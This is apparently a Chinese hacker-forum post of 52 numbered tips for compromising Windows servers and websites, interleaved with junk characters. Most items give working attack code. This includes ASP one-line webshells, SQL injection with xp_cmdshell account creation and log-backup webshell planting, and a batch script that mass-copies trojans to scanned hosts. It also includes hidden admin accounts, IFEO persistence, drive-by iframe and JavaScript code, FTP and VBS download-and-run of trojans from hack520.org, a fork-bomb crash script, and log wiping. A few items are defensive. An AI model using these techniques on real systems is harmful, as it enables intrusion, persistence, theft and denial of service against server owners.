Xp系统修改权限防止病毒或木马等破坏系统,cmd下," Q% Q6 j0 w |
cacls C:\windows\system32 /G hqw20:R
0 @% v9 u' a5 O7 s; g思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
; D$ i# m7 V j! N; j6 y& P6 r恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F7 W( ~" u# q3 M- r! @1 _1 W0 G, c
3 s6 A$ H4 ~& k1 S( U
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
6 ^% `) k' U. C+ U, N3 N: p: W" U$ J m
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。* Y7 Y' }# k9 a9 K* w) W
+ j4 B& M' c8 D& q* I+ k6 Y4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号0 _* E; @8 D9 y0 n# p. l1 h* x) Z2 V0 U, I
* Z* D0 q z7 S4 J5、利用INF文件来修改注册表
5 u5 U7 B4 V& U6 q' J* D[Version]" {2 c3 n! H& P" `' |( N6 w
Signature="$CHICAGO$"# u5 o7 H/ q7 p2 M& b
[Defaultinstall] @8 @- j- C) }; C. L4 [- B
addREG=Ating! m8 ]& H5 t. f5 E4 g/ o1 _
[Ating]
9 `4 i4 j# b% |7 z kHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
) w. I+ H, Y/ @) D- H以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
4 Z; m F! V! c0 F5 |8 Wrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径8 ?3 V. J8 g7 r6 [
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU7 \7 Q# E, a# Y
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
) B! o' g3 b8 z! y" a+ x) V2 uHKEY_CURRENT_CONFIG 简写为 HKCC
9 Y: [1 ?! c; ~" @ h7 U; A# U0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值' T! p# N3 M E: N: J- t
"1"这里代表是写入或删除注册表键值中的具体数据: r' Q. m! b- T0 q, N1 R( l& K% w
$ G0 } o, `- J+ `+ p: i6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
& K& k1 G9 O! O' D多了一步就是在防火墙里添加个端口,然后导出其键值$ o) f6 o; k1 S% u6 |; L) M
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]8 W' b# ^ T% n" m. Q. [7 }
4 v/ r! W5 B: u2 N( E
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
$ g$ O' c) @0 c, Z在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
# C( A- K: [7 @
) u7 X) A/ i6 j9 q4 {8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。9 e1 z# z3 T E5 G! \! h: C
) E9 j3 k7 a. M- Z+ g2 B9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,/ [- J' _) m; T: M( K0 G
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。; q p. c( w" E: [1 d% j
1 c1 [6 {& z- S- L G3 F0 G10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
* |" k9 ^5 S1 Q0 ^* Q* X! w5 w' m8 H
. ~6 L6 s2 X- ]. n3 w11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
) W( C3 m% Y- i9 ?用法:xsniff –pass –hide –log pass.txt
- H0 Y* h4 z! n9 H+ `- |. ?) U6 b) ~- Q3 Q, x. j4 W) ]
12、google搜索的艺术! c! z: U- q8 Q. F; A
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”1 x9 ?0 \/ k: Q( E6 F
或“字符串的语法错误”可以找到很多sql注入漏洞。/ r* n" E4 t# ^, d7 X2 B4 B
: p0 p3 ?4 n1 V [13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
+ o1 Q7 U; ^' _8 P) k A
! j. S+ _8 `- z/ i( D+ y14、cmd中输入 nc –vv –l –p 1987
8 A- z0 G- B7 g做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
9 v/ z/ L8 C9 ?7 B& D4 [: ]# j7 b/ h" i0 w
15、制作T++木马,先写个ating.hta文件,内容为5 L) q" ^0 e }) ]
<script language="VBScript">7 p! p5 |6 X, [. M) p
set wshshell=createobject ("wscript.shell" )
4 i" m; Z# E% J3 m, t1 V' _) Ha=wshshell.run("你马的名称",1)
3 t+ N- \8 p7 r. pwindow.close5 e7 J9 U) D6 y- j
</script>. l9 N' D: ]: Y" t/ D
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
& Z5 m) F$ A; k+ L! J. k# v
' [0 E" I7 H, L6 s9 X& M16、搜索栏里输入
3 C7 \$ L" W# }6 g P" g8 I关键字%'and 1=1 and '%'='% [9 p v8 z8 X- u" ~6 S# F& v
关键字%'and 1=2 and '%'='
# I7 k" p! Z; U4 n2 {比较不同处 可以作为注入的特征字符
2 i6 z) u, c2 ^3 |. V
" x6 | o2 R: L% P. h, B17、挂马代码<html>
# Z4 G _2 o8 W<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
& P2 c0 B% L6 m+ r2 A) K- o; Z</html>
/ m6 ]0 H/ p3 R
: d- V1 `: v; \: F18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,( T- n1 p# U5 S0 b7 L7 s' w! E
net localgroup administrators还是可以看出Guest是管理员来。8 e% G- n9 x' G, z
1 g; c( B: l# J4 K2 @! I! `6 f9 n
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
3 j# U! @. N& G+ ~ M用法: 安装: instsrv.exe 服务名称 路径* n% b* |% Q/ ?: X9 I
卸载: instsrv.exe 服务名称 REMOVE/ J2 c% B4 z0 \
+ e9 ^* Q, `3 B1 C3 B" k b
7 E2 @) H+ k. ~: M5 w5 y; d0 B
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉$ i, h/ q7 _4 T. b; b
不能注入时要第一时间想到%5c暴库。3 D: ^' D: u2 V) o' @
) t5 B1 g& e" W22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
6 l/ v( w: R# v% k' |. U" r( n, R; z9 W% s$ B
23、缺少xp_cmdshell时 y5 g; L% J* A5 N3 l5 r8 {
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
& Y- u0 t4 |7 Y2 p h4 {假如恢复不成功,可以尝试直接加用户(针对开3389的)2 v7 Y% v" C8 K0 }6 U) b- K
declare @o int
. i) ?, ?/ L) z% P% \; Aexec sp_oacreate 'wscript.shell',@o out
) Q- ]. U8 C( L2 g' Q* k- Aexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员* I* E4 ^/ I. }) Z: `
3 q6 W8 g1 Q, U9 E2 f/ U6 {24.批量种植木马.bat
$ R7 G6 a P+ ]! D1 _. Lfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
) U. v) g1 r8 l- Z8 }) [5 qfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
$ W3 \5 I* r8 b- ~ i1 d: K扫描地址.txt里每个主机名一行 用\\开头, B9 ?. B; j( D5 F- W
. X+ p& i. ^2 ~! _6 W5 h
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。- l9 \" @4 j( `6 G8 V0 _
, ]: A* g0 N% g2 j8 _* m: I1 W5 z
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.$ F t5 V$ U& _
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.% v) X, ^- i8 }& w
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马1 g& M$ m6 M% _- m
! b; B2 i4 Q5 `8 n2 e
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP1 y& f# S9 P" S T
然后用#clear logg和#clear line vty *删除日志+ [7 Y* r% [" W/ d+ K5 a8 @8 r1 D
* s2 L4 p- T! y
28、电脑坏了省去重新安装系统的方法
$ [! P _" J+ o9 B! l纯dos下执行,/ E5 [0 c; H, |- ?' e! U
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config) V4 P. j% d! t$ B5 s
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
/ [# C/ X3 L, ~& t
1 r. P0 x6 @# C6 l. _29、解决TCP/IP筛选 在注册表里有三处,分别是:
4 r' @' b) K1 v+ }3 PHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
, t4 x3 Z& }: Y+ g" a' q. o+ BHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
5 O! Q. j2 P, K/ WHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
3 @0 T5 k8 X% f* x; ]3 ?分别用; P( E+ C8 S+ c4 [' D7 ~
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip& d7 \3 {+ |! O
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip5 z1 r4 v& {7 o. u
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 ?/ O G G, X9 i. F命令来导出注册表项
; J$ H* A& }2 I9 X. ^然后把三个文件里的EnableSecurityFilters"=dword:00000001,$ R- k2 M/ G& ~3 \
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用5 K" N% f: w. V' `
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
# u) J$ _% F ] L& ^: ]$ M) A; O$ L9 M
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U8 u3 W9 i E' \1 [. V
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
7 j( z5 D* d2 V* g1 j+ {9 d$ T' o) R+ `* K: q
31、全手工打造开3389工具
. H& I3 y* Q l& r7 m. \: C打开记事本,编辑内容如下:
6 t4 b. F. N* ?( Z+ h) uecho [Components] > c:\sql
+ z4 F, J2 i/ `' u, U- Y1 `1 u1 b& gecho TSEnable = on >> c:\sql3 A- `7 b. G5 S a+ g
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q+ {8 y0 O/ X; z9 E4 \6 {, q
编辑好后存为BAT文件,上传至肉鸡,执行9 U' @- N0 \: p- c: \2 F
; _1 [: z% l8 k; t9 O
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马' j& M. N& C' y5 q
6 w/ d3 n& s! c9 D9 t33、让服务器重启! f6 u$ r( d# i7 B" n* w0 x; \7 S6 S
写个bat死循环:9 Q5 w y4 T) l& m! O/ z( V
@echo off* M# B K" ^ Z* r# u2 @ D9 n, F
:loop1) C# y. j( @/ N2 o0 ^
cls
, }% W% X0 d- F, _) y5 A! Ustart cmd.exe% b+ \1 L3 h4 O2 r" y3 f
goto loop1; U' h2 [# `' Z; }, g
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
# [' u* P/ x/ K v! A9 ]) W$ K
/ ?8 L& ~6 w9 |3 A- d F3 _$ P34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
" _. b: g5 z# r" H@echo off7 A4 x3 ~6 ~( n6 `. S
date /t >c:/3389.txt' X* |' ^( k j2 A# W
time /t >>c:/3389.txt
- r9 g& d1 ?' w0 {3 z8 oattrib +s +h c:/3389.bat' y1 b3 ~7 l$ J- [& y* U h# v
attrib +s +h c:/3389.txt
- r4 E; w* j4 ^. H# A) V X0 X9 Z. Unetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
( H2 [' O1 N$ z4 P! v并保存为3389.bat' c) r9 Y% h" P) ^
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
6 t2 J; ~( v; d. k2 l
9 I9 U B! l3 x+ i8 t% A! ~35、有时候提不了权限的话,试试这个命令,在命令行里输入:
/ N! r" V! \( s7 U+ c7 `start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)6 y- E- c2 J, E- {
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
7 x6 b! j5 J! u+ g8 N* I6 _
/ Y# X4 w1 D2 f; Z9 \' w! v' D36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
3 }" }* G8 `" H4 Y1 ?echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
7 N' e" A& t; G" C \4 R ^echo 你的FTP账号 >>c:\1.bat //输入账号
& _, {, `; ^7 J5 U- D' c5 oecho 你的FTP密码 >>c:\1.bat //输入密码1 @, T- H0 E' n3 G4 {+ ]( }
echo bin >>c:\1.bat //登入
- O: C( k3 e: i( O- ?! M# b/ W- Xecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么1 g8 p" z. ~4 x& r1 E3 t6 Z
echo bye >>c:\1.bat //退出
; e( ^2 X/ ^* Z; W1 x# D然后执行ftp -s:c:\1.bat即可
, i& C1 t) _4 b3 e7 o5 y8 @. K7 }# r' I
37、修改注册表开3389两法
`5 g' q( ], S(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表% k" a: J! o3 n" u6 }
echo Windows Registry Editor Version 5.00 >>3389.reg
/ H1 S( C, U# Iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
3 l* l; H2 B+ G n: i; h3 M3 D; {echo "Enabled"="0" >>3389.reg
9 R, }* D/ S0 a# ]echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows) L3 c" d9 Z, B& m1 e/ U ~
NT\CurrentVersion\Winlogon] >>3389.reg
5 X* {' [2 p+ `6 b- y. Hecho "ShutdownWithoutLogon"="0" >>3389.reg
7 Z9 @$ z0 z: u2 ^2 Necho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]- u8 O0 O @, ?* `( J
>>3389.reg
" n7 c! k7 b9 D3 v4 W! i$ i, oecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
( X5 N' U2 x/ n3 `, S4 aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
$ D0 @: t1 V$ i, c>>3389.reg
5 F6 [/ K- f$ z' i4 pecho "TSEnabled"=dword:00000001 >>3389.reg
# b1 J. p4 i5 t& {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg( [- s. V1 [- Y& T
echo "Start"=dword:00000002 >>3389.reg
7 L1 p2 v/ |% \9 t7 techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
3 U- f: O- m4 z9 p% J>>3389.reg/ W% t& L# ^% b6 F+ j. v0 D- ~* E
echo "Start"=dword:00000002 >>3389.reg; G7 r, F8 {8 X5 i: ^) I3 G
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
; K9 e5 ~( Z: |+ ` K, g# M: ~echo "Hotkey"="1" >>3389.reg/ ?0 @3 H# x; K5 r- t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* F& o* L' N1 Y8 J0 ]0 B; J2 h
Server\Wds\rdpwd\Tds\tcp] >>3389.reg) r1 o. K0 o' ^$ t4 Z$ S
echo "PortNumber"=dword:00000D3D >>3389.reg$ H) D0 S3 S k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* Z O, S: L" y7 _# [0 G2 AServer\WinStations\RDP-Tcp] >>3389.reg; `# t0 M J3 G3 w$ ~2 H
echo "PortNumber"=dword:00000D3D >>3389.reg5 v& ]- \; \) g1 V8 E
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
4 ^2 ~6 x; |/ F$ x3 e7 B% X(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
( g3 z$ S, {3 V- J. {因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效. B8 ?1 {6 W: h" a( I
(2)winxp和win2003终端开启
) N+ R9 p& y, \7 H+ A# x用以下ECHO代码写一个REG文件:
K+ {. S& c+ f9 a( eecho Windows Registry Editor Version 5.00>>3389.reg
& M3 e. J$ g+ `echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% l/ n. |5 k; t! V4 {! G1 w
Server]>>3389.reg
! ~: l# y1 t: d8 {* Zecho "fDenyTSConnections"=dword:00000000>>3389.reg
$ c2 q# v0 U6 h- ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" H$ t2 x# j XServer\Wds\rdpwd\Tds\tcp]>>3389.reg* R* j; j" Z) S3 E
echo "PortNumber"=dword:00000d3d>>3389.reg
2 G. n) A4 W3 d S# l. decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 ?8 {, ^' G; l% e2 {
Server\WinStations\RDP-Tcp]>>3389.reg
4 X. T! c3 [5 o! d$ n+ A* F- aecho "PortNumber"=dword:00000d3d>>3389.reg6 z: c+ \# n$ g* `# ^
然后regedit /s 3389.reg del 3389.reg
' t/ b% C4 P9 M% p6 r: ZXP下不论开终端还是改终端端口都不需重启
n- L( K, M% [1 f$ r. h( B+ m! {! f& x% Y( X
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃6 E: n9 O; H1 m J* L: z% e+ L
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'8 ?$ J+ y z4 [
; ~, a T2 Q' z
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!3 R) r3 n5 a; a& ]6 y L) v
(1)数据库文件名应复杂并要有特殊字符
- ~+ ]0 n/ }5 \( q(2)不要把数据库名称写在conn.asp里,要用ODBC数据源6 b7 m2 O2 r! G7 I! T
将conn.asp文档中的* [/ ]0 L2 q' s. {
DBPath = Server.MapPath("数据库.mdb")5 @1 Q+ H) R6 x2 S) f/ g# l
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath. K4 }& l# @+ [
5 W; r3 E& s6 m4 z! J- W% h
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
4 q) V# _9 ?8 T% X" D+ c(3)不放在WEB目录里
. f/ ^/ Q8 [- q( `3 D$ O' [' V' J0 b7 t. \5 ?# P$ u* |3 X
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉5 b4 c5 f% u. L( k# f. b B% O
可以写两个bat文件9 z8 _0 g7 d r
@echo off
$ `% z! O% W6 ~@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe3 ?8 r3 O E8 k+ [0 N
@del c:\winnt\system32\query.exe
3 Y2 f( |' S d+ T+ l@del %SYSTEMROOT%\system32\dllcache\query.exe$ r ]( \; ^1 o8 c) g5 N
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
L; w h$ U5 g' \) L8 S: M% d+ C% z! v# }
@echo off
7 E6 ~7 m) F5 E- X' T# @@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
, n. q, g9 O% L, s3 W5 U0 D/ s@del c:\winnt\system32\tsadmin.exe
- A# x9 E8 P9 _( d$ V. E@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
# W3 h9 \ v6 A+ p& ~9 ]" X
# a T) _: \5 |41、映射对方盘符
& G% U, N' R- R( ftelnet到他的机器上,* V0 S8 @3 @) {9 N' `0 [
net share 查看有没有默认共享 如果没有,那么就接着运行
) \) l4 E7 A% B! a/ X/ Snet share c$=c:
; | L+ W* }6 F" a; H* s1 C- Cnet share现在有c$7 A1 U# w) W: k% f* S
在自己的机器上运行7 X3 c Y1 k, I% r) Z0 p G$ E
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K, f( \6 c4 Z& {; S9 \
% E1 s- J1 \( C4 Z
42、一些很有用的老知识
- G D' `; i) V. _5 ~/ atype c:\boot.ini ( 查看系统版本 )
+ B6 u, A4 O/ H5 F0 f3 Tnet start (查看已经启动的服务)' Z; p$ z) I8 R$ O6 d9 O
query user ( 查看当前终端连接 )
/ b3 `( [9 R+ \6 g! {net user ( 查看当前用户 )4 ]* t3 W* i8 ^9 r
net user 用户 密码/add ( 建立账号 )
% V' O. P; X" w+ @+ {net localgroup administrators 用户 /add (提升某用户为管理员)
1 @ ?) q% e' K( K+ L/ g2 Gipconfig -all ( 查看IP什么的 ) @8 V# U; A8 `- Y1 Y. Z2 x$ R5 Z$ ^
netstat -an ( 查看当前网络状态 )
, Q5 E# N! V, pfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
+ f+ c; l. C7 r4 J; q* ?2 q克隆时Administrator对应1F4
# @: t/ t R7 @, k. Dguest对应1F54 _5 t# S. ?& }) @4 T* H
tsinternetuser对应3E8
5 {9 X9 w+ ^5 n6 I4 @* s0 [8 I# k2 G0 b' Z" {+ p
43、如果对方没开3389,但是装了Remote Administrator Service
* f' r: s* k/ p4 X" T6 a% N4 f用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
. d2 @" F. R/ m0 B解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
! J0 D2 _; H! v5 c; A) c先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"; E& l% s, Z0 _6 I% _
( t, ~* M- ~- A& ?- Z8 }: |& A8 C
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
4 {3 n O# a+ {; s本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)) c8 m2 |( e8 J) y
1 D! a/ w& H$ m8 i' |' U
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)+ w# p |3 Q* z+ a
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open, p7 |% P, |8 \6 K" W
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
" U8 |1 A+ z" A2 A! U4 c! ]CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
" Q$ c* T9 O2 `1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs l5 P9 B. n2 l% F* o
(这是完整的一句话,其中没有换行符)+ I& U; F4 D- i
然后下载:: [0 R6 ~& d+ `, ]
cscript down.vbs http://www.hack520.org/hack.exe hack.exe/ D. t9 \! f6 y$ |8 E
6 K+ F$ Z+ X8 D0 x3 R# j* r46、一句话木马成功依赖于两个条件:- a/ U- t+ [/ b3 E6 `" G
1、服务端没有禁止adodb.Stream或FSO组件5 ~! T4 T8 n' U0 N
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。! c$ ^% X: s. K# r- _1 S9 T- b/ E% i
, P; D: E9 N; H4 P* N- q/ i5 d4 W; y2 G47、利用DB_OWNER权限进行手工备份一句话木马的代码:) o6 ^4 b1 { ^
;alter database utsz set RECOVERY FULL--- \3 @5 N2 O! y" |; y
;create table cmd (a image)--
, `3 H' r' u2 t* \; q( u;backup log utsz to disk = 'D:\cmd' with init--$ ?) E3 |7 V5 ]% h! {2 i7 H
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
R$ [4 h0 E" |# ^;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--# m$ S0 \, T" t/ k$ {
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。3 q3 p! |/ E P5 F
3 K& `) R% v, x" Q2 T- {$ s1 _
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:# _2 ?7 O( Y- W0 w& ], S0 W
0 h; l+ A6 [5 E6 O' _用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
1 ^* V( V; L% h: f! M# F, R* l所有会话用 'all'。& F& x3 C$ r4 u6 \( b- T( e
-s sessionid 列出会话的信息。
+ S+ [3 p* g7 [" g4 s% ]: _# [4 O-k sessionid 终止会话。
; ? {* r* j( k$ {& s E-m sessionid 发送消息到会话。; h! Z/ S5 p- p8 t
' }; a( }/ c7 {config 配置 telnet 服务器参数。
3 w, W0 n; {$ H! x; S% t& @" [; Y& n. C* O+ Y+ |6 T" S& j7 y. y0 J
common_options 为:" G6 G+ ~3 B* P
-u user 指定要使用其凭据的用户
9 O$ D* |, u) v H! K9 E-p password 用户密码
4 J+ Y8 `1 ?5 O
4 f( F d8 D2 C$ I! V9 _0 N; \config_options 为:
4 g3 A+ S6 ~" l+ K$ }dom = domain 设定用户的默认域
g1 ]$ a9 N actrlakeymap = yes|no 设定 ALT 键的映射! |% n$ k3 M- r/ t# X
timeout = hh:mm:ss 设定空闲会话超时值
" i, E4 Z( h8 L. P5 V. m6 T# Q5 ?* j; Atimeoutactive = yes|no 启用空闲会话。
* ~% Q7 n _" g: Q7 r9 Mmaxfail = attempts 设定断开前失败的登录企图数。5 n) p# X# b; V9 q" U1 A8 B
maxconn = connections 设定最大连接数。
1 J0 L" k! }$ `, l+ s1 J S0 rport = number 设定 telnet 端口。1 R) R7 p9 h! c W# m& w
sec = [+/-]NTLM [+/-]passwd
: w- F% d2 ~+ P" C. Z- `1 [设定身份验证机构8 e/ h0 L) M* \& Z6 `( v5 Q
fname = file 指定审计文件名。0 Q4 I( T/ i% I8 y
fsize = size 指定审计文件的最大尺寸(MB)。
% S6 ]! Y2 R* f3 z& R6 y4 vmode = console|stream 指定操作模式。
' }1 v: z: V5 Qauditlocation = eventlog|file|both) @4 A( ~4 @# f( U1 m- z
指定记录地点) f1 h- }2 C" r7 X: o
audit = [+/-]user [+/-]fail [+/-]admin% f$ n/ S% Z$ P3 X K* f5 D6 r, M
/ _$ P9 f0 x0 u: ~- |49、例如:在IE上访问:
. \# J' n' f) K ]* O V: ^www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
3 _: ^# W/ K% P9 z5 |6 f# Q$ S! Phack.txt里面的代码是:( v. V; z5 G5 l! g; K
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">5 e M( X' y6 T9 b1 k* Z4 w
把这个hack.txt发到你空间就可以了!
* y0 I% }$ H& S, s! P; u这个可以利用来做网马哦!
2 O0 [ l' e9 Y" ?( G5 e8 D2 F1 k7 h$ W! p8 B& [7 r4 O1 Y* @
50、autorun的病毒可以通过手动限制!! l0 _, ~9 [9 C7 r5 Z4 X
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
' a" L3 j; c. t7 s% U2,打开盘符用右键打开!切忌双击盘符~' L2 u% i& W6 M
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
* T6 T4 v1 I; y1 G: w' ]$ W& m4 a+ O4 L
51、log备份时的一句话木马:# n& z2 {( u. E
a).<%%25Execute(request("go"))%%25>3 c/ ~7 Z! i$ q6 g3 m, ]" z
b).<%Execute(request("go"))%>
3 l( T" V; l* Jc).%><%execute request("go")%><%
0 B; {" T( X: @2 C3 ad).<script language=VBScript runat=server>execute request("sb")</Script>
- d/ j6 c" o' X0 Ye).<%25Execute(request("l"))%25>! r6 S. C- X' l. U* D) r: v! H( k( v
f).<%if request("cmd")<>"" then execute request("pass")%>8 H: k: Z' C- V' D1 D$ Q$ K" h
2 X4 K& Z3 W0 G7 [' d w- Q
52、at "12:17" /interactive cmd% P' _# E3 U1 f R% |$ x8 }/ a
执行后可以用AT命令查看新加的任务
" R& w1 b8 s" g$ Y5 C5 q用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
